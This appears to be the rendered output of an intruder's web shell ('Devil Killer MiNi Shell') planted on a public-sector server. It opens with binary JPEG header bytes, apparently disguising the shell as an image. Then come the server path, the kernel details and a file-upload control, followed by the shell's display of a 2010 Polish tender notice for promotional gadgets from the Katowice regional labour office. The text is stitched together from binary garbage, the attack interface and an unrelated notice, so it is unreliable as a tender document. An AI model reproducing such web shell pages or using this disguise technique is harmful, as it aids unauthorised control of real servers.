JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100419/88271-N-2010.html

<p class="kh_header"><b>Katowice: Dostawa materiałów promocyjno-informacyjnych oraz gadżetów dla potrzeb projektu Kompetencje na miarę potrzeb oraz Promocja przedsiębiorczości w województwie śląskim.</b><br>
<b>Numer ogłoszenia: 88271 - 2010; data zamieszczenia: 19.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka oragaznizacyjna samorządu województwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów promocyjno-informacyjnych oraz gadżetów dla potrzeb projektu Kompetencje na miarę potrzeb oraz Promocja przedsiębiorczości w województwie śląskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Część I:  
 Przedmiotem zamówienia jest dostawa materiałów informacyjno-promocyjnych oraz gadżetów wraz z nadrukiem promujących projekt konkursowy realizowany przez Wojewódzki Urząd Pracy w Katowicach pt.Kompetencje na miarę na potrzeb w ramach Poddziałania 7.2.1 PO KL.

- Zakreślacz - zakreślacz tekstu, rozmiar 8 x 1 x 2,3 cm +,- 10%, obudowa wykonana  z plastiku w kolorze pomarańczowym (korpus) oraz czarnym (zatyczka oraz końcówka korpusu), 1 kolor: pomarańczowy. Nadruk: flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny z logo Programu Operacyjnego Kapitał Ludzki. Logotypy naniesione techniką tampodruku na korpusie zakreślacza. Projekt do akceptacji Zamawiającego. Ilość: 220 sztuk.
- Zestaw karteczek samoprzylepnych - Zestaw karteczek samoprzylepnych, składający się z 2 bloków (większy i mniejszy) po 100 karteczek do notatek każdy i 100 karteczek do markowania samoprzylepnych (5 kolorów po 25 sztuk w każdym kolorze). Zestaw umieszczono w białym, twardym etui. Rozmiar zestawu 8x10,5x1,7 cm (+,-10%). Nadruk logotypów techniką tampodruku (flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz logo Programu Operacyjnego Kapitał Ludzki, strona WWW WUP w Katowicach oraz informacja o współfinansowaniu zakupu ze środków EFS w ramach PO KL- projekt do ostatecznej akceptacji Zamawiającego). Ilość: 220 szt.
- Smycz reklamowa - szerokość minimum 15 maksimum 20 mm, długość całkowita (po złożeniu) maksimum 530 mm, taśma w kolorze pomarańczowym, nadruk sublimacyjny dwustronny w pełnym kolorze (do akceptacji przez Zamawiającego), zawierający  logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna energia oraz adres strony internetowej WUP; z metalowym karabińczykiem oraz ze złączką metalową lub plastikową, zawierająca pętelkę na komórkę. Projekt graficzny sporządzony przez Wykonawcę i przedstawiony do akceptacji przez Zamawiającego. Ilość: 220 sztuk.
- Teczka konferencyjna - teczka wykonana tworzywa sztucznego lub ekoskóry (kolor czarny), zamykana na zamek, z wieloma przegródkami (na wizytówki oraz większe dokumenty), kalkulatorem, szlufką na długopis oraz minimum 30-kartkowy notatnik formatu A-4 w linie. Rozmiar:  35 x 26,2 x 4,8 cm (+/- 10%); nadruk w technice laserowej lub wyraźnego tampodruku (technika zostanie określona przez Zamawiającego podczas realizacji zamówienia), kolorystyka nadruku 1+0, nadruk obejmujący logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz adres strony internetowej WUP (projekt przedstawiony do akceptacji Zamawiającemu). Ilość:220 sztuk.
- Notatnik - format A-4, okładka kreda mat 200g/m2, środek offset 70g/m2, kolorystyka nadruk: okładka pełny kolor + folia mat + lakier wybiórczy na logotypach (projekt graficzny okładki sporządzony przez Wykonawcę i przedstawiony do zatwierdzenia Zamawiającemu), środek kolorystyka 4+0 CMYK, objętość minimum 50 kartek, klejone na krótszym bloku, wzmocnione tekturką z tyłu (projekt graficzny stron notatnika sporządzony przez Wykonawcę pokrewny z projektem rollbannera, należy przedstawić do zatwierdzenia Zamawiającemu). Notatnik zawierać ma loga (flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia, dane teleadresowe, strona WWW, informacja o współfinansowaniu ze środków EFS w ramach PO KL oraz hasło PO KL Człowiek-najlepsza inwestycja. Ilość: 400 sztuk.
- Długopis reklamowy - aluminiowy z niebieskim wkładem, w kolorze srebrno-niebieskim (korpus niebieski, przycisk, uchwyt oraz końcówka srebrne) oraz srebrno-szarym (korpus szary, przycisk, uchwyt oraz końcówka srebrne). Wersje kolorystyczne w równych częściach. Wymiary nie mniejsze niż 13,5 x o 1,2 cm.
W okolicach końcówki korpusu długopisu zamieszczony wzór pięciu srebrnych pierścieni, nadruk w technice laserowej lub wyraźnego tampodruku (technika zostanie określona przez Zamawiającego podczas realizacji zamówienia), kolorystyka nadruku 1+0, nadruk obejmujący logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny po jednej stronie korpusu oraz adres strony internetowej WUP po drugiej stronie. Projekt do akceptacji Zamawiającego. Ilość: 400 sztuk.
- Rollbanner pojedynczy - wymiary co najmniej 200 cm x 100 cm, podstawa - aluminiowa kaseta z podwójnym mechanizmem zwijającym, kolor srebrny, 1 aluminiowy maszt; zestaw zaopatrzony w torbę transportową czarną. Nadruk na nośniku 4+0, na tkaninie powlekanej PCV; projekt graficzny (pokrewny z projektem notatnika) uwzględniony w cenie - do akceptacji Zamawiającego, musi zawierać logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna Energia, dane teleadresowe w tym adres strony internetowej WUP,  informację o współfinansowaniu ze środków EFS w ramach PO KL oraz hasło PO KL Człowiek-najlepsza inwestycja. Ilość: 5 szt. 

Uwagi ogólne:
- Logotypy oraz treść informacji umieszczonych na projektach graficznych Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu .
- Skład DTP materiałów drukowanych wraz z projektami jest uwzględniony
w cenie usługi, a przed drukiem musi być dostarczony do akceptacji przez Zamawiającego. Zamawiający zaakceptuje projekt w ciągu 3 dni roboczych od dnia przekazania projektu.
- Wykonawca dostarczy (dostawa jednorazowa) materiały promocyjne do siedziby Zamawiającego w ciągu 21 dni kalendarzowych od dnia zawarcia umowy.
- Wykonawca przekazuje Zamawiającemu prawa do dysponowania użytymi
w materiałach poligraficznych ich formami graficznymi (tzw. layoutami), przekaże również pliki w formie multimedialnej utworzonych layoutów w formacie .cdr.

2.	Część II :
 Przedmiotem zamówienia jest dostawa gadżetów wraz z nadrukiem - pendrive, promujących projekt konkursowy realizowany przez Wojewódzki Urząd Pracy w Katowicach pt.Kompetencje na miarę na potrzeb w ramach Poddziałania 7.2.1 PO KL.

- Pendrive USB 2GB - obudowa plastikowa lub plastikowo aluminiowa, kolor srebrny, pojemność: minimum 2 GB, obsługiwany typ złącz USB 2.0, prędkość zapisu danych min. 4 MB/s, prędkość odczytu danych min. 12 MB/s, kompatybilne z Windows 9x, Milenium, XP, Media Center oraz Vista, wymiary obudowy po zamknięciu nie mniejsze niż 58 x 18 x 9 mm. Gwarancja producenta oraz Wykonawcy zamówienia na wszystkie elementy produktu nie krótsza niż 24 miesiące. Wykonawca pokrywa również  koszty transportu ewentualnych reklamacji.  Nadruk w technice graweru laserowego lub tampodruku (do uzgodnienia na etapie projektowania: logo Programu Operacyjnego Kapitał Ludzki, flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny po jednej stronie, po drugiej adres strony internetowej Wojewódzkiego Urzędu Pracy, projekt graficzny nadruków do akceptacji Zamawiającego. Ilość: 220 szt.
Uwagi ogólne:
- Logotypy oraz treść informacji umieszczonych na projekcie graficznym Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu.
- Wykonawca dostarczy (dostawa jednorazowa) pendrive wraz z nadrukiem do siedziby Zamawiającego w ciągu 21 dni kalendarzowych od dnia zawarcia umowy.

3. Część III :
 Przedmiotem zamówienia jest dostawa materiałów informacyjno-promocyjnych wraz z nadrukiem promujących  projekt  systemowy realizowany przez Wojewódzki Urząd Pracy w Katowicach pt.Promocja przedsiębiorczości w województwie śląskim w ramach Działania 6.2. PO KL.

- Etui na wizytówki - Wymiar - długość minimum 9 cm - maksimum 11 cm x szerokość: minimum 6 cm - maksimum 8 cm. Etui na wizytówki wykonane z metalu chromowanego, oprawione w ekoskórę w kolorze czarnym. Zamykane na magnes. Pakowane w pudełka wykonane z ozdobnego, fakturowanego kartonu w kolorze stalowym lub białym.Etui oznaczone logiem Programu Operacyjnego Kapitał Ludzki i flagą Unii Europejskiej. Oznaczenie na etui wykonane laserem. Nadruk na pudełku w kolorze czarnym zwierający logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz adres strony internetowej projektu lub Wojewódzkiego Urzędu Pracy w Katowicach. Ilość - 200 sztuk
- Teczka konferencyjna z rączką - Teczka wykonana z ekoskóry w kolorze czarnym lub brązowym, wyposażona wewnątrz w jedną obszerną kieszeń oraz trzy kieszenie płaskie w tym: jedną zapinaną na suwak, cztery kieszonki na wizytówki, uchwyt na pióro i długopis, metalowy klip i ring. Całość zamykana na suwak. Na wyposażeniu długopis metalowy oznaczony logotypami Unii Europejskiej, Kapitał Ludzki oraz Śląskie - pozytywna (logotypy wykonane laserem) oraz notes formatu A4. Teczka opatrzona logotypami Unii Europejskiej, Kapitał Ludzki, Śląskie - pozytywna energia, adresem strony internetowej projektu, logotypy tłoczone na sucho. Teczka zafoliowana i przewiązana wstążką. Ilość - 100 sztuk. 
- Organizer -  Wykonany z ekoskóry w kolorze czarnym lub brązowym formatu A6 wyposażony w ring, dwie płaskie kieszonki, pięć kieszonek na wizytówki, uchwyt na pióro, zamykany na klapkę. Zawiera : kalendarz , notatnik i teleadresownik. Na organizerze umieszczone logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energii i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz adres strony internetowej projektu. Logotypy wytłoczone na sucho. Organizer zafoliowany i przewiązany wstążką. Ilość - 100 sztuk.
- Smycz - Smycz szerokość minimum15 maksimum 20 mm, długość całkowita (po złożeniu) maksimum 530 mm. Nadruk w pełnym kolorze z dwóch stron. Wyposażenie : metalowy karabińczyk oraz zaczep do telefonu komórkowego. Na smyczy umieszczono logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz  adres strony internetowej projektu lub Wojewódzkiego Urzędu Pracy w Katowicach do uzgodnienia na etapie projektowania z Zamawiającym. Ilość - 1044 sztuki.
- Kołonotes - Format A5, zawiera 100 kartek. Kołonotatnik wyposażony w metalowa sprężynę, umieszczoną po prawej stronie. Projekt okładki wliczony w cenę zamówienia. Na okładce umieszczone logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz strony internetowej projektu lub Wojewódzkiego Urzędu Pracy w Katowicach, do uzgodnienia na etapie projektowania z Zamawiającym. Ilość - 100 sztuk.
- Plastikowy długopis- Długopis reklamowy plastikowy, wyposażony w przyciskowy mechanizm wysuwania wkładu, kolor pomarańczowy, granatowy, biały, czarny lub zielony (do wyboru przez Zamawiającego), grubość linii pisma 0,3-0,4 mm, nie krótszy niż 125 mm i nie dłuższy niż 150 mm, grubość 9 - 13 mm, wkład wymienny koloru niebieskiego lub czarnego , nadruk w technice tampodruk, w kolorystyce 1+0 obejmujący logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, po jednej stronie korpusu oraz adres strony internetowej po drugiej stronie korpusu - projekt do akceptacji przez Zamawiającego. Pakowane zbiorczo po 50 sztuk w paczkach. Ilość - 100 sztuk.
Uwagi ogólne:
- Logotypy oraz treść informacji umieszczonych na projektach graficznych Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu.
- Skład DTP materiałów drukowanych wraz z projektami jest uwzględniony
w cenie usługi, a przed drukiem musi być dostarczony do akceptacji przez Zamawiającego. Zamawiający zaakceptuje projekt w ciągu 3 dni roboczych od dnia przekazania projektu.
- Wykonawca dostarczy (dostawa jednorazowa) materiały promocyjne do siedziby Zamawiającego do dnia 28 maja 2010 r..
- Wykonawca przekazuje Zamawiającemu prawa do dysponowania użytymi
w materiałach poligraficznych ich formami graficznymi (tzw. layoutami), przekaże również pliki w formie multimedialnej utworzonych layoutów w formacie .cdr.
4.	Cześć IV :
 Przedmiotem zamówienia jest dostawa gadżetów wraz z nadrukiem - pendrive, promujących projekt systemowy realizowany przez Wojewódzki Urząd Pracy w Katowicach pt.Promocja przedsiębiorczości w województwie śląskim w ramach Działania 6.2. PO KL.
- Pendrive USB 2 GB - Wymiar - długość: minimum 8 cm - maksimum 9 cm x szerokość: minimum 5,00 cm - maksimum 6 cm. Pendrive 2 GB w kształcie karty kredytowej z wysuwanym mechanizmem, wykonany z plastiku lub aluminium, pakowany jednostkowo w woreczek foliowy. Kompatybilne z: Win98/NT/ME/2000/XP/Vista/Win7  Złącze: USB 2.0 kompatybilne z USB 1.1. Na pendrivie umieszczone logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz  adres strony internetowej projektu lub Wojewódzkiego Urzędu Pracy w Katowicach, do uzgodnienia na etapie projektowania z Zamawiającym. Ilość - 300 sztuk.
- Pendrive USB 1 GB - Wymiar - długość : minimum 6 cm - maksimum 8 cm x szerokość: minimum 2,00 cm - maksimum 3 cm. Obudowa wykonana z plastiku pokrytego aluminium. Kompatybilne z: Win98/NT/ME/2000/XP/Vista/Win7 Złącze: USB 2.0 kompatybilne z USB 1.1. Na pendrivie umieszczone logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny do uzgodnienia na etapie projektowania z Zamawiającym. Ilość - 100 sztuk.
Uwagi ogólne:
- Logotypy oraz treść informacji umieszczonych na projekcie graficznym Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu.
- Wykonawca dostarczy (dostawa jednorazowa) pendrive wraz z nadrukiem do siedziby Zamawiającego do dnia 28 maja 2010 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu jest wniesienie wadium .
Wadium w wysokości:
1)	660,00 zł (sześćset sześćdziesiąt  złotych 00/100) - część I
2)	160,00 zł (sto sześćdziesiąt złotych 00/100) - część II
3)	590,00 zł (pięćset dziewięćdziesiąt  złotych 00/100) - część III
4)	300,00 zł (trzysta złotych 00/100) - część IV

Wadium w formie pieniądza należy wpłacać na konto prowadzone w GETIN Bank S.A. II ODDZIAŁ W KATOWICACH: 
nr 52 1560 0013 2367 0237 0105 0001 
W pozostałych formach:
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych;
- 	gwarancjach ubezpieczeniowych, 
- 	    poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) wadium należy złożyć w siedzibie Zamawiającego tj. ul. Kościuszki 30, III piętro, pok. 352 - KANCELARIA, od poniedziałku do piątku w godzinach 8:00 do 15:00).
2. Wadium wnosi się przed upływem terminu składania ofert tj. do dnia 27 kwietnia 2010 r. do godz. 10.00.
3. W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie będzie decydować data wpływu środków na rachunek bankowy Zamawiającego.
4. Zamawiający zwraca  wadium :
4.1. wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 17.7,
4.2. niezwłocznie na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
4.3. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy.
5. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium po wyborze najkorzystniejszej oferty, a toczyło się postępowanie odwoławcze i w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.
5.1. ponowne wniesienie wadium nastąpi w terminie określonym przez Zamawiającego.
6. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca:
7.1. w odpowiedzi na wezwanie nie złożył dokumentów lub oświadczeń lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
7.2. którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
7.3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą się realizacją co najmniej trzech usług odpowiadających swoim rodzajem i zakresem przedmiotowi zamówienia w ciągu  ostatnich 3 lat, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Należy załączyć dokumenty  potwierdzające, że te usługi zostały wykonane należycie - np. referencje,
Zamawiający na podstawie załączonych dokumentów oceni spełnienie tego warunku w następujący sposób: spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotycz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

